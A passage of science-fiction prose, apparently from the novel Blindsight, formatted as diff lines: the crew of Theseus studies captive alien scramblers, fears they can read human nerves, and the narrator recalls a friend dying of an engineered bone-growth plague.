+ConSensus bleeped into my silence. "Orbital maneuvers starting in five," Sarasti announced. "Inlays and wireless prosthetics offline in ninety. That's all."
+Bates shut down the display. "I'm going to ride this out in the bridge. Illusion of control and all that. You?"
+"My tent, I think."
+She nodded, and braced to jump, and hesitated.
+"By the way," she told me, "yes."
+"Sorry?"
+"You asked if I thought the emplacements were necessary. Right now I think we need all the protection we can get."
+"So you think that Rorschach might—"
+"Hey, it already killed me once. "
+She wasn't talking about radiation.
+I nodded carefully. "That must have been…"
+"Like nothing at all. You couldn't possibly imagine." Bates took a breath and let it out.
+"Maybe you don't have to," she added, and sailed away up the spine.
+
+*
+
+Cunningham and the Gang in BioMed, thirty degrees of arc between them. Each poked their captives in their own way. Susan James stabbed indifferently at a keypad painted across her desktop. Windows to either side looked in on Stretch and Clench.
+Cookie-cutter shapes scrolled across the desk as James typed: circles, triskelions, a quartet of parallel lines. Some of them pulsed like abstract little hearts. In his distant pen, Stretch reached out one fraying tentacle and tapped something in turn.
+"Any progress?"
+She sighed and shook her head. "I've given up trying to understand their language. I'm settling for a pidgin." She tapped an icon. Clench vanished from his window; a hieroglyphic flowchart sprang up in his place. Half the symbols wriggled or pulsed, endlessly repetitive, a riot of dancing doodles. Others just sat there.
+"Iconic base." James waved vaguely at the display. "Subject-Verb phrases render as animated versions of noun icons. They're radially symmetrical, so I array modifiers in a circular pattern around the central subject. Maybe that comes naturally to them."
+A new circle of glyphs appeared beneath James's—Stretch's reply, presumably. But something in the system didn't like what it saw. Icons flared in a separate window: a luminous counter flashed 500 Watts, and held steady. On the screen, Stretch writhed. It reached out with squirming backbone-arms and stabbed repeatedly at its touchpad.
+James looked away.
+New glyphs appeared. 500 Watts retreated to zero. Stretch returned to its holding pattern; the spikes and jags of its telemetry smoothed.
+James let out her breath. "What happened?" I asked.
+"Wrong answer." She tapped into Stretch's feed, showed me the display that had tripped it up. A pyramid, a star, simplified representations of a scrambler and of Rorschach rotated on the board.
+"It was stupid, it was just a—a warm-up exercise, really. I asked it to name the objects in the window." She laughed softly and without humor. "That's the thing about functional languages, you know. If you can't point at it, you can't talk about it."
+"And what did it say?"
+She pointed at Stretch's first spiral: "Polyhedron star Rorschach are present."
+"It missed the scrambler."
+"Got it right the second time. Still, stupid mistake for something that can think rings around a vampire, isn't it?" Susan swallowed. "I guess even scramblers slip up when they're dying."
+I didn't know what to say. Behind me, barely audible, Cunningham muttered some two-stroke mantra to himself in an endless loop.
+"Jukka says—" Susan stopped, began again: "You know that blindsight we get sometimes, in Rorschach?"
+I nodded, and wondered what Jukka had said.
+"Apparently the same thing can happen to the other senses too," she told me. "You can have blindtouch, and blindsmell, and blindhearing..."
+"That would be deafness."
+She shook her head. "But it isn't really, is it? Any more than blindsight is really blindness. Something in your head is still taking it all in. Something in the brain is still seeing, and hearing, even if you're not—aware of it. Unless someone forces you to guess, or there's some threat. You just get a really strong feeling you should move out of the way, and five seconds later a bus drives over the spot you were standing. You knew it was coming, somehow. You just don't know how you knew."
+"It's wild," I agreed.
+"These scramblers—they know the answers, Siri. They're intelligent, we know they are. But it's almost as though they don't know they know, unless you hurt them. As if they've got blindsight spread over every sense."
+I tried to imagine it: life without sensation, without any active awareness of one's environment. I tried to imagine existing like that without going mad. "Do you think that's possible?"
+"I don't know. It's just a—a metaphor, I guess." She didn't believe that. Or she didn't know. Or she didn't want me to know.
+I should have been able to tell. She should have been clear.
+"At first I just thought they were resisting," she said, "but why would they?" She turned bright, begging eyes on me, pleading for an answer.
+I didn't have one. I didn't have a clue. I turned away from Susan James, only to find myself facing Robert Cunningham: Cunningham the mutterer, fingers tapping against tabletop interfaces, inner eyes blinded, vision limited now to the pictures ConSensus sketched in airspace or threw against flat surfaces for everyone to see. His face remained as empty of feeling as it had ever been; the rest of his body twitched like a bug in a spiderweb.
+He might as well have been. We all might. Rorschach loomed barely nine kilometers away now, so near it might have eclipsed Ben itself if I'd been brave enough to look outside. We had closed to this insane proximity and parked. Out there, Rorschach grew like a live thing. In there, live things grew, budded like jellyfish from some demonic mechanical substrate. Those lethal, vacant corridors we'd crept along, frightened of the shadows planted in our heads—they were probably filling with scramblers right now. All those hundreds of kilometers of twisted tunnels and passages and chambers. Filling with an army.
+This was Sarasti's safer alternative. This was the path we'd followed because it would have been too dangerous to release the prisoners. We were so deep inside the bow shock that we'd had to shut down our internal augments; while Rorschach's magnetosphere was orders of magnitude weaker here than within the structure itself, who knew if the alien might find us too tempting a target—or too great a threat—at this range? Who knew when it might choose to plunge some invisible spike through Theseus's heart?
+Any pulse that could penetrate the ship's shielding would doubtless fry Theseus's nervous system as well as the wiring in our heads. I supposed that five people in a dead ship would have a marginally greater chance of survival if their brains weren't sparking in the bargain, but I doubted that such a difference would make much difference. Sarasti had obviously figured the odds differently. He'd even shut down the antiEuclidean pump in his own head, resorted to manual injections to keep himself from short-circuiting.
+Stretch and Clench were even closer to Rorschach than we were. Cunningham's lab had been kicked free of the ship; it floated now just a few kilometers from the artefact's outermost spires, deep within the folds of its magnetic field. If the scramblers needed radioactive magnetite to function, this was the most they were going to get: a taste of the fields, but not of freedom. The lab's shielding was being dynamically fine-tuned to balance medical necessity against tactical risk, as best the data allowed. The structure floated in the watchful crosshairs of our newborn gun emplacements, strategically positioned to either side. Those emplacements could destroy the hab in an instant. They could probably destroy anything approaching it as well.
+They couldn't destroy Rorschach, of course. Maybe nothing could.
+Covert to invulnerable. As far as we knew that hadn't happened yet. Presumably Theseus could still do something about the artefact accreting off our bow, assuming we could decide which thing to do. Sarasti wasn't talking. In fact, I couldn't remember the last time any of us had even seen the vampire in the flesh. For several shifts now he had confined himself to his tent, speaking only through ConSensus.
+Everyone was on edge, and the transient had gone quiet.
+Cunningham muttered to himself, stabbed at unfamiliar controls with unpracticed fingers, cursed his own clumsiness. Stimulus and response flowed through lasers across six kilometers of ionized vacuum. The ever-present nicotine stick hung from one corner of his mouth for want of a free hand. Every now and then flecks of ash broke free and drifted obliquely towards the ventilators.
+He spoke before I could. "It's all in ConSensus." When I didn't leave he relented, but wouldn't look at me: "Magnetite flecks lined up as soon as they got past the wavefront, more or less. Membranes started to fix themselves. They're not failing as fast. But it's Rorschach's internal environment that will be optimized for scrambler metabolism. Out here, I think the most we can do is slow the rate of dying."
+"That's something, at least."
+Cunningham grunted. "Some of the pieces are coming together. Others—their nerves are frayed, for no good reason. Literally. Signal leakage along the cables."
+"Because of their deterioration?" I guessed.
+"And I can't get the Arrhenius equation to balance, there's all this nonlinearity at low temperatures. The preexponential value's completely fucked up. It's almost as though temperature doesn't matter, and —shit—"
+Some critical value had exceeded a confidence limit on one of his displays. He glanced up the drum, raised his voice: "Need another biopsy, Susan. Anywhere central."
+"What—oh. Just a second." She shook her head and tapped off a brief spiral of icons, as listless as the captives she commanded. On one of Cunningham's windows Stretch viewed her input with its marvelous sighted skin. It floated unresponsive for a moment. Then it folded back the arms facing one wall, opening a clear path for Cunningham's teleops.
+He called two of them from their burrows like prehensile serpents. The first wielded a clinical core-sampler; the second wielded the threat of violence in case of foolish resistance. It was hardly necessary. Blindsighted or not, scramblers were fast learners. Stretch exposed its belly like a victim resigned to imminent rape. Cunningham fumbled; the teleops bumped together, briefly entangled. He cursed and tried again, every move shouting frustration. His extended phenotype had been amputated; once the very ghost in the machine, now he was just another guy punching buttons, and—
+—and suddenly, something clicked. Cunningham's facades swirled to translucency before my eyes. Suddenly, I could almost imagine him.
+He got it right the second time. The tip of his machine shot out like a striking snake and darted back again, almost too fast to see. Waves of color flushed from Stretch's injury like ripples chased across still water by a falling stone.
+Cunningham must have thought he saw something in my face. "It helps if you try not to think of them as people," he said. And for the very first time I could read the subtext, as clear and sharp as broken glass:
+Of course, you don't think of anyone that way...
+
+*
+
+Cunningham didn't like to be played.
+No one does. But most people don't think that's what I'm doing. They don't know how much their bodies betray when they close their mouths. When they speak aloud, it's because they want to confide; when they don't, they think they're keeping their opinions to themselves. I watch them so closely, customize each word so that no system ever feels used— and yet for some reason, that didn't work with Robert Cunningham.
+I think I was modeling the wrong system.
+Imagine you are a synthesist. You deal in the behavior of systems at their surfaces, infer the machinery beneath from its reflections above. That is the secret of your success: you understand the system by understanding the boundaries that contain it.
+Now imagine you encounter someone who has ripped a hole in those boundaries and bled beyond them.
+Robert Cunningham's flesh could not contain him. His duties pulled him beyond the meat sack; here in the Oort, his topology rambled all over the ship. That was true of all of us, to some extent; Bates and her drones, Sarasti and his limbic link—even the ConSensus inlays in our heads diffused us a bit, spread us just slightly beyond the confines of our own bodies. But Bates only ran her drones; she never inhabited them. The Gang of Four may have run multiple systems on a single motherboard, but each had its own distinct topology and they only surfaced one at a time. And Sarasti—
+Well, Sarasti was a whole different story, as it turned out.
+Cunningham didn't just operate his remotes; he escaped into them, wore them like a secret identity to hide the feeble Human baseline within. He had sacrificed half of his neocortex for the chance to see x-rays and taste the shapes hiding in cell membranes, he had butchered one body to become a fleeting tenant of many. Pieces of him hid in the sensors and manipulators that lined the scrambler's cages; I might have gleaned vital cues from every piece of equipment in the subdrum if I'd ever thought to look. Cunningham was a topological jigsaw like everyone else, but half his pieces were hidden in machinery. My model was incomplete.
+I don't think he ever aspired to such a state. Looking back, I see radiant self-loathing on every remembered surface. But there in the waning years of the twenty-first century, the only alternative he could see was the life of a parasite. Cunningham merely chose the lesser evil.
+Now, even that was denied him. Sarasti's orders had severed him from his own sensorium. He no longer felt the data in his gut; he had to interpret it, step by laborious step, through screens and graphs that reduced perception to flat empty shorthand. Here was a system traumatized by multiple amputations. Here was a system with its eyes and ears and tongue cut out, forced to stumble and feel its way around things it had once inhabited, right down in the bone. Suddenly there was nowhere else to hide, and all those far-flung pieces of Robert Cunningham tumbled back into his flesh where I could see them at last.
+It had been my mistake, all along. I'd been so focused on modelling other systems that I'd forgotten about the one doing the modelling. Bad eyes are only one bane of clear vision: bad assumptions can be just as blinding, and it wasn't enough to imagine I was Robert Cunningham.
+I had to imagine I was Siri Keeton as well.
+
+*
+
+Of course, that only raises another question. If my guess about Cunningham was right, why did my tricks work on Isaac Szpindel? He was every bit as discontinuous as his replacement.
+I didn't think about it much at the time. Szpindel was gone but the thing that had killed him was still there, hanging right off the bow, a vast swelling enigma that might choose to squash us at any instant. I was more than a little preoccupied.
+Now, though—far too late to do anything about it—I think I might know the answer.
+Maybe my tricks didn't work on Isaac either, not really. Maybe he saw through my manipulations as easily as Cunningham did. But maybe he just didn't care. Maybe I could read him because he let me. Which would mean— I can't find another explanation that fits— that he just liked me, regardless.
+I think that might have made him a friend.
+"If I can but make the words awake the feeling"
+—Ian Anderson, Stand Up
+
+Night shift. Not a creature was stirring.
+Not in Theseus, anyway. The Gang hid in their tent. The transient lurked weightless and silent below the surface. Bates was in the bridge— she more or less lived up there now, vigilant and conscientious, nested in camera angles and tactical overlays. There was nowhere she could turn without seeing some aspect of the cipher off our starboard bow. She did what good she could, for the good it would do.
+The drum turned quietly, lights dimmed in deference to a diel cycle that a hundred years of tweaks and retrofits hadn't been able to weed from the genes. I sat alone in the galley, squinting from the inside of a system whose outlines grew increasingly hazy, trying to compile my latest—how had Isaac put it?— postcard to posterity. Cunningham worked upside-down on the other side of the world.
+Except Cunningham wasn't working. He hadn't even moved for at least four minutes. I'd assumed he was reciting the Kaddish for Szpindel—ConSensus said he'd be doing it twice daily for the next year, if we lived that long—but now, leaning to see around the spinal bundles in the core, I could read his surfaces as clearly as if I'd been sitting beside him. He wasn't bored, or distracted, or even deep in thought.
+Robert Cunningham was petrified.
+I stood and paced the drum. Ceiling turned into wall; wall into floor. I was close enough to hear his incessant soft muttering, a single indistinct syllable repeated over and over; then I was close enough to hear what he was saying—
+"fuck fuck fuck fuck..."
+—and still Cunningham didn't move, although I'd made no attempt to mask my approach.
+Finally, when I was almost at his shoulder, he fell silent.
+"You're blind," he said without turning. "Did you know that?"
+"I didn't."
+"You. Me. Everyone." He interlocked his fingers and clenched as if in prayer, hard enough to whiten the knuckles. Only then did I notice: no cigarette.
+"Vision's mostly a lie anyway," he continued. "We don't really see anything except a few hi-res degrees where the eye focuses. Everything else is just peripheral blur, just— light and motion. Motion draws the focus. And your eyes jiggle all the time, did you know that, Keeton? Saccades, they're called. Blurs the image, the movement's way too fast for the brain to integrate so your eye just—shuts down between pauses. It only grabs these isolated freeze-frames, but your brain edits out the blanks and stitches an — an illusion of continuity into your head."
+He turned to face me. "And you know what's really amazing? If something only moves during the gaps, your brain just—ignores it. It's invisible."
+I glanced at his workspace. The usual splitscreen glowed to one side—realtime images of the scramblers in their pens—but Histology, ten thousand times larger than life, took center stage. The paradoxical neural architecture of Stretch & Clench glistened on the main window, flensed and labeled and overlaid by circuit diagrams a dozen layers thick. A dense, annotated forest of alien trunks and brambles. It looked a little like Rorschach itself.
+I couldn't parse any of it.
+"Are you listening, Keeton? Do you know what I'm saying?"
+"You've figured out why I couldn't—you're saying these things can somehow tell when our eyes are offline, and..."
+I didn't finish. It just didn't seem possible.
+Cunningham shook his head. Something that sounded disturbingly like a giggle escaped his mouth. "I'm saying these things can see your nerves firing from across the room, and integrate that into a crypsis strategy, and then send motor commands to act on that strategy, and then send other commands to stop the motion before your eyes come back online. All in the time it would take a mammalian nerve impulse to make it halfway from your shoulder to your elbow. These things are fast, Keeton. Way faster than we could have guessed even from that high-speed whisper line they were using. They're bloody superconductors."
+It took a conscious effort to keep from frowning. "Is that even possible?"
+"Every nerve impulse generates an electromagnetic field. That makes it detectable."
+"But Rorschach's EM fields are so—I mean, reading the firing of a single optic nerve through all that interference—"
+"It's not interference. The fields are part of them, remember? That's probably how they do it."
+"So they couldn't do that here."
+"You're not listening. The trap you set wouldn't have caught anything like that, not unless it wanted to be caught. We didn't grab specimens at all. We grabbed spies."
+Stretch and Clench floated in splitscreen before us, arms swaying like undulating backbones. Cryptic patterns played slowly across their cuticles.
+"Supposing it's just— instinct," I suggested. "Flounders hide against their background pretty well, but they don't think about it."
+"Where are they going to get that instinct from, Keeton? How is it going to evolve? Saccades are an accidental glitch in mammalian vision. Where would scramblers have encountered them before now?" Cunningham shook his head. "That thing, that thing Amanda's robot fried— it developed that strategy on its own, on the spot. It improvised."
+The word intelligent barely encompassed that kind of improvisation. But there was something else in Cunningham's face, some deeper distress nested inside what he'd already told me.
+"What?" I asked.
+"It was stupid," he said. "The things these creatures can do, it was just dumb."
+"How do you mean?"
+"Well it didn't work, did it? Couldn't keep it up in front of more than one or two of us."
+Because people's eyes don't flicker in synch, I realized. Too many witnesses stripped it of cover.
+"—many other things it could have done," Cunningham was saying. "They could've induced Anton's or, or an agnosia: then we could have tripped over a whole herd of scramblers and it wouldn't even register in our conscious minds. Agnosias happen by accident, for God's sake. If you've got the senses and reflexes to hide between someone's saccades, why stop there? Why not do something that really works?"
+"Why do you think?" I asked, reflexively nondirective.
+"I think that first one was—you know it was a juvenile, right? Maybe it was just inexperienced. Maybe it was stupid, and it made a bad decision. I think we're dealing with a species so far beyond us that even their retarded children can rewire our brains on the fly, and I can't tell you how fucking scared that should make you."
+I could see it in his topology. I could hear it in his voice. His nerveless face remained as calm as a corpse.
+"We should just kill them now," he said.
+"Well, if they're spies, they can't have learned much. They've been in those cages the whole time, except—" for the way up. They'd been right next to us the whole trip back…
+"These things live and breath EM. Even stunted, even isolated, who knows how much of our tech they could have just read through the walls?"
+"You've got to tell Sarasti," I said.
+"Oh, Sarasti knows. Why do you think he wouldn't let them go?"
+"He never said anything about—"
+"He'd be crazy to fill us in. He keeps sending you down there, remember? Do you think for a second he'd tell you what he knows and then set you loose in a labyrinth full of mind-reading minotaurs? He knows, and he's already got it factored a thousand ways to Sunday." Cunningham's eyes were bright manic points blazing in an expressionless mask. He raised them to the center of the drum, and didn't raise his voice a decibel. "Isn't that right, Jukka?"
+I checked ConSensus for active channels. "I don't think he's listening, Robert."
+Cunningham's mouth moved in something that would have been a pitying smile if the rest of his face had been able to join in. "He doesn't have to listen, Keeton. He doesn't have to spy on us. He just knows."
+Ventilators, breathing. The almost-subliminal hum of bearings in motion. Then Sarasti's disembodied voice rang forth through the drum.
+"Everyone to Commons. Robert wants to share."
+
+*
+
+Cunningham sat to my right, his plastic face lit from beneath by the conference table. He stared down into that light, rocking slightly. His lips went through the ongoing motions of some inaudible incantation. The Gang sat across from us. To my left Bates kept one eye on the proceedings and another on intelligence from the front lines.
+Sarasti was with us only in spirit. His place at the head of the table remained empty. "Tell them," he said.
+"We have to get out of h—"
+"From the beginning."
+Cunningham swallowed and started again. "Those frayed motor nerves I couldn't figure out, those pointless cross-connections—they're logic gates. Scramblers time-share. Their sensory and motor plexii double as associative neurons during idle time, so every part of the system can be used for cognition when it isn't otherwise engaged. Nothing like it ever evolved on Earth. It means they can do a great deal of processing without a lot of dedicated associative mass, even for an individual."
+"So peripheral nerves can think?" Bates frowned. "Can they remember?"
+"Certainly. At least, I don't see why not." Cunningham pulled a cigarette from his pocket.
+"So when they tore that scrambler apart—"
+"Not civil war. Data dump. Passing information about us, most likely."
+"Pretty radical way to carry on a conversation," Bates remarked.
+"It wouldn't be their first choice. I think each scrambler acts as a node in a distributed network, when they're in Rorschach at least. But those fields would be configured down to the Angstrom, and when we go in with our tech and our shielding and blowing holes in their conductors—we bollocks up the network. Jam the local signal. So they resort to a sneakernet."
+He had not lit his cigarette. He rolled the filtered end between thumb and forefinger. His tongue flickered between his lips like a worm behind a mask.
+Hidden in his tent, Sarasti took up the slack. "Scramblers also use Rorschach's EM for metabolic processes. Some pathways achieve proton transfer via heavy-atom tunneling. Perhaps the ambient radiation acts as a catalyst."
+"Tunneling?" Susan said. "As in quantum?"
+Cunningham nodded. "Which also explains your shielding problems. Partly, at least."
+"But is that even possible? I mean, I thought those kind of effects only showed up under cryonic—"
+"Forget this," Cunningham blurted. "We can debate the biochemistry later, if we're still alive."
+"What do we debate instead, Robert?" Sarasti said smoothly.
+"For starters, the dumbest of these things can look into your head and see what parts of your visual cortex are lighting up. And if there's a difference between that and mind-reading, it's not much of one."
+"As long as we stay out of Rorschach—"
+"That ship has sailed. You people have already been there. Repeatedly. Who knows what you already did down there for no better reason than because Rorschach made you?"
+"Wait a second," Bates objected. "None of us were puppets down there. We hallucinated and we went blind and—and crazy even, but we were never possessed."
+Cunningham looked at her and snorted. "You think you'd be able to fight the strings? You think you'd even feel them? I could apply a transcranial magnet to your head right now and you'd raise your middle finger or wiggle your toes or kick Siri here in the sack and then swear on your sainted mother's grave that you only did it because you wanted to. You'd dance like a puppet and all the time swear you were doing it of your own free will, and that's just me, that's just some borderline OCD with a couple of magnets and an MRI helmet." He waved at the vast unknowable void beyond the bulkhead. Shreds of mangled cigarette floated sideways in front of him. "Do you want to guess what that can do? For all we know we've already given them Theseus' technical specs, warned them about the Icarus array, and then just decided of our own free will to forget it all."
+"We can cause those effects," Sarasti said coolly. "As you say. Strokes cause them. Tumors. Random accidents."
+"Random? Those were experiments, people! That was vivisection! They let you in so they could take you apart and see what made you tick and you never even knew it."
+"So what?" the vampire snapped invisibly. Something cold and hungry had edged into his voice. Human topologies shivered around the table, skittish.
+"There's a blind spot in the center of your visual field," Sarasti pointed out. "You can't see it. You can't see the saccades in your visual timestream. Just two of the tricks you know about. Many others."
+Cunningham was nodding. "That's my whole point. Rorschach could be—"
+"Not talking about case studies. Brains are survival engines, not truth detectors. If self-deception promotes fitness, the brain lies. Stops noticing— irrelevant things. Truth never matters. Only fitness. By now you don't experience the world as it exists at all. You experience a simulation built from assumptions. Shortcuts. Lies. Whole species is agnosiac by default. Rorschach does nothing to you that you don't already do to yourselves."
+Nobody spoke. It was several silent seconds before I realized what had happened.
+Jukka Sarasti had just given us a pep talk.
+He could have shut down Cunningham's tirade—could have probably shut down a full-scale mutiny—by just sailing into our midst and baring his teeth. By looking at us. But he wasn't trying to frighten us into submission, we were already nervous enough. And he wasn't trying to educate us either, fight fear with fact; the more facts any sane person gathered about Rorschach, the more fearful they'd become. Sarasti was only trying to keep us functional, lost in space on the edge of our lives, facing down this monstrous enigma that might destroy us at any instant for any reason. Sarasti was trying to calm us down: good meat, nice meat. He was trying to keep us from falling apart. There there.
+Sarasti was practicing psychology.
+I looked around the table. Bates and Cunningham and the Gang sat still and bloodless.
+Sarasti sucked at it.
+"We have to get out of here," Cunningham said. "These things are way beyond us."
+"We've shown more aggression than they have," James said, but there was no confidence in her voice.
+"Rorschach plays those rocks like marbles. We're sitting in the middle of a shooting gallery. Any time it feels like—"
+"It's still growing. It's not finished."
+"That's supposed to reassure me?"
+"All I'm saying is, we don't know," James said. "We could have years yet. Centuries."
+"We have fifteen days," Sarasti announced.
+"Oh shit," someone said. Cunningham, probably. Maybe Sascha.
+For some reason everyone was looking at me.
+Fifteen days. Who knows what had gone into that number? None of us asked aloud. Maybe Sarasti, in another fit of inept psychology, had made it up on the spur of the moment. Or maybe he'd derived it before we'd even reached orbit, held it back against the possibility—only now expired— that he might yet send us back into the labyrinth. I'd been half blind for half the mission; I didn't know.
+But one way or another, we had our Graduation Day.
+
+*
+
+The coffins lay against the rear bulkhead of the crypt—on what would be the floor during those moments when up and down held any meaning. We'd slept for years on the way out. We'd had no awareness of time's passage—undead metabolism is far too sluggish even to support dreams—but somehow the body knew when it needed a change. Not one of us had chosen to sleep in our pods once we'd arrived. The only times we'd done so had been on pain of death.
+But the Gang had taken to coming here ever since Szpindel had died.
+His body rested in the pod next to mine. I coasted into the compartment and turned left without thinking. Five coffins: four open and emptied, one sealed. The mirrored bulkhead opposite doubled their number and the depth of the compartment.
+But the Gang wasn't there.
+I turned right. The body of Susan James floated back-to-back with her own reflection, staring at an inverse tableau: three sealed sarcophagi, one open. The ebony plaque set into the retracted lid was dark; the others shone with identical sparse mosaics of blue and green stars. None of them changed. There were no scrolling ECGs, no luminous peak-and-valley tracings marked cardio or cns. We could wait here for hours, days, and none of those diodes would so much as twinkle. When you're undead, the emphasis is on the second syllable.
+The Gang's topology had said Michelle when I'd first arrived, but it was Susan who spoke now, without turning. "I never met her."
+I followed her gaze to the name tag one of the sealed pods: Takamatsu. The other linguist, the other multiple.
+"I met everyone else," Susan continued. "Trained with them. But I never met my own replacement."
+They discouraged it. What would have been the point?
+"If you want to—" I began.
+She shook her head. "Thanks anyway."
+"Or any of the others—I can only imagine what Michelle—"
+Susan smiled, but there was something cold about it. "Michelle doesn't really want to talk to you right now, Siri."
+"Ah." I hesitated for a moment, to give anyone else a chance to speak up. When nobody did, I pushed myself back towards the hatch. "Well, if any of you change—"
+"No. None of us. Ever."
+Cruncher.
+"You lie," he continued. "I see it. We all do."
+I blinked. "Lie? No, I—"
+"You don't talk. You listen. You don't care about Michelle. Don't care about anyone. You just want what we know. For your reports."
+"That's not entirely true, Cruncher. I do care. I know Michelle must—"
+"You don't know shit. Go away."
+"I'm sorry I upset you." I rolled on my axis and braced against the mirror.
+"You can't know Meesh," he growled as I pushed off. "You never lost anyone. You never had anyone.
+"You leave her alone."
+
+*
+
+He was wrong on both counts. And at least Szpindel had died knowing that Michelle cared for him.
+Chelsea died thinking I just didn't give a shit.
+It had been two years or more, and while we still interfaced occasionally we hadn't met in the flesh since the day she'd left. She came at me from right out of the Oort, sent an urgent voice message to my inlays: Cygnus. Please call NOW. It's important.
+It was the first time since I'd known her that she'd ever blanked the optics.
+I knew it was important. I knew it was bad, even without picture. I knew because there was no picture, and I could tell it was worse than bad from the harmonics in her voice. I could tell it was lethal.
+I found out afterwards that she'd gotten caught in the crossfire. The Realists had sown a fibrodysplasia variant outside the Boston catacombs; an easy tweak, a single-point retroviral whose results served both as an act of terrorism and an ironic commentary on the frozen paralysis of Heaven's occupants. It rewrote a regulatory gene controlling ossification on Chromosome 4, and rigged a metabolic bypass at three loci on 17.
+Chelsea started growing a new skeleton. Her joints were calcifying within fifteen hours of exposure, her ligaments and tendons within twenty. By then they were starving her at the cellular level, trying to slow the bug by depriving it of metabolites, but they could only buy time and not much of it. Twenty-three hours in, her striated muscles were turning to stone.
+I didn't find this out immediately, because I didn't call her back. I didn't need to know the details. I could tell from her voice that she was dying. Obviously she wanted to say goodbye.
+I couldn't talk to her until I knew how to do that.
+I spent hours scouring the noosphere, looking for precedents. There's no shortage of ways to die; I found millions of case records dealing with the etiquette. Last words, last vows, instruction manuals for the soon-to-bereaved. Palliative neuropharm. Extended and expository death scenes in popular fiction. I went through it all, assigned a dozen front-line filters to separate heat from light.
+By the time she called again the news was out: acute Golem outbreak lancing like a white-hot needle through the heart of Boston. Containment measures holding. Heaven secure. Modest casualties expected. Names of victims withheld pending notification of kin.
+I still didn't know the principles, the rules: all I had were examples. Last wills and testaments; the negotiation of jumpers with their would-be rescuers; diaries recovered from imploded submarines or lunar crash sites. Recorded memoirs and deathbed confessions rattling into flatline. Black box transcripts of doomed spaceships and falling beanstalks, ending in fire and static. All of it relevant. None of it useful; none of it her.
+She called again, and still the optics were blank, and still I didn't answer.
+But the last time she called, she didn't spare me the view.
+They'd made her as comfortable as possible. The gelpad conformed to every twisted limb, every erupting spur of bone. They would not have left her in any pain.
+Her neck had torqued down and to the side as it petrified, left her staring at the twisted claw that had once been her right hand. Her knuckles were the size of walnuts. Plates and ribbons of ectopic bone distended the skin of her arms and shoulders, buried her ribs in a fibrous mat of calcified flesh.
+Movement was its own worst enemy. Golem punished even the slightest twitch, provoked the growth of fresh bone along any joints and surfaces conspiring to motion. Each hinge and socket had its own nonrenewable ration of flexibility, carved in stone; every movement depleted the account. The body seized incrementally. By the time she let me look at her, Chelsea had almost exhausted her degrees of freedom.
+"Cyg," she slurred. "Know you're there."
+Her jaw was locked half-open; her tongue must have stiffened with every word. She did not look at the camera. She could not look at the camera.
+"Guess I know why you're not answ'ring. I'll try'nt—try not to take it pers'n'lly."
+Ten thousand deathbed goodbyes arrayed around me, a million more within reach. What was I supposed to do, pick one at random? Stitch them into some kind of composite? All these words had been for other people. Grafting them onto Chelsea would reduce them to clichés, to trite platitudes. To insults.
+"Want t'say, don' feel bad. I know y're just— 's'not your fault, I guess. You'd pick up if you could."
+And say what? What do you say to someone who's dying in fast-forward before your eyes?
+"Just keep trying t'connect, y'know. Can't help m'self…"
+Although the essentials of this farewell are accurate, details from several deaths have been combined for dramatic purposes.
+"Please? Jus'—talk to me, Cyg…"
+More than anything, I wanted to.
+"Siri, I…just…"
+I'd spent all this time trying to figure out how.
+"Forget't," she said, and disconnected.
+I whispered something into the dead air. I don't even remember what.
+I really wanted to talk to her.
+I just couldn't find an algorithm that fit.
+"Ye shall know the truth, and the truth shall make you mad."
+—Aldous Huxley
+
+They'd hoped, by now, to have banished sleep forever.
+The waste was nothing short of obscene: a third of every Human life spent with its strings cut, insensate, the body burning fuel but not producing. Think of all we could accomplish if we didn't have to lapse into unconsciousness every fifteen hours or so, if our minds could stay awake and alert from the moment of infancy to that final curtain call a hundred twenty years later. Think of eight billion souls with no off switch and no down time until the very chassis wore out.
+Why, we could go to the stars.
+It hadn't worked out that way. Even if we'd outgrown the need to stay quiet and hidden during the dark hours—the only predators left were those we'd brought back ourselves—the brain still needed time apart from the world outside. Experiences had to be catalogued and filed, mid-term memories promoted to long-term ones, free radicals swept from their hiding places among the dendrites. We had only reduced the need for sleep, not eliminated it—and that incompressible residue of downtime seemed barely able to contain the dreams and phantoms left behind. They squirmed in my head like creatures in a draining tidal pool.
+I woke.
+I was alone, weightless, in the center of my tent. I could have sworn something had tapped me on the back. Leftover hallucination, I thought. A lingering aftereffect of the haunted mansion, going for one last bit of gooseflesh en route to extinction.
+But it happened again. I bumped against the keelward curve of the bubble, bumped again, head and shoulder-blades against fabric; the rest of me came after, moving gently but irresistibly—
+Down.
+Theseus was accelerating.
+No. Wrong direction. Theseus was rolling, like a harpooned whale at the surface of the sea. Turning her belly to the stars.
+I brought up ConSensus and threw a Nav-tac summary against the wall. A luminous point erupted from the outline of our ship, crawled away from Big Ben leaving a bright filament etched in its wake. I watched until the numbers read 15G.
+"Siri. My quarters, please."
+I jumped. It sounded as though the vampire had been at my very shoulder.
+"Coming."
+An ampsat relay, climbing at long last to an intercept with the Icarus antimatter stream. Somewhere behind the call of duty, my heart sank.
+We weren't running, Robert Cunningham's fondest wishes notwithstanding. Theseus was stockpiling ordnance.
+
+*
+
+The open hatch gaped like a cave in the face of a cliff. The pale blue light from the spine couldn't seem to reach inside. Sarasti was barely more than a silhouette, black on gray, his bright bloody eyes reflecting catlike in the surrounding gloom.
+"Come." He amped up the shorter wavelengths in deference to human vision. The interior of the bubble brightened, although the light remained slightly red-shifted. Like Rorschach with high beams.
+I floated into Sarasti's parlor. His face, normally paper-white, was so flushed it looked sunburned. He gorged himself, I couldn't help thinking. He drank deep. But all that blood was his own. Usually he kept it deep in the flesh, favoring the vital organs. Vampires were efficient that way. They only washed out their peripheral tissues occasionally, when lactate levels got too high.
+Or when they were hunting.
+He had a needle to his throat, injected himself with three cc's of clear liquid as I watched. His antiEuclideans. I wondered how often he had to replenish them, now that he'd lost faith in the implants. He withdrew the needle and slipped it into a sheath geckoed to a convenient strut. His color drained as I watched, sinking back to the core, leaving his skin waxy and corpselike.
+"You're here as official observer," Sarasti said.
+I observed. His quarters were even more spartan than mine. No personal effects to speak of. No custom coffin lined with shrink-wrapped soil. Nothing but two jumpsuits, a pouch for toiletries, and a disconnected fiberop umbilicus half as thick as my little finger, floating like a roundworm in formalin. Sarasti's hardline to the Captain. Not even a cortical jack, I remembered. It plugged into the medulla, the brainstem. That was logical enough; that was where all the neural cabling converged, the point of greatest bandwidth. Still, it was a disquieting thought—that Sarasti linked to the ship through the brain of a reptile.
+An image flared on the wall, subtly distorted against the concave surface: Stretch and Clench in their adjoining cells, rendered in splitscreen. Cryptic vitals defaced little grids below each image.
+The distortion distracted me. I looked for a corrected feed in ConSensus, came up empty. Sarasti read my expression: "Closed circuit."
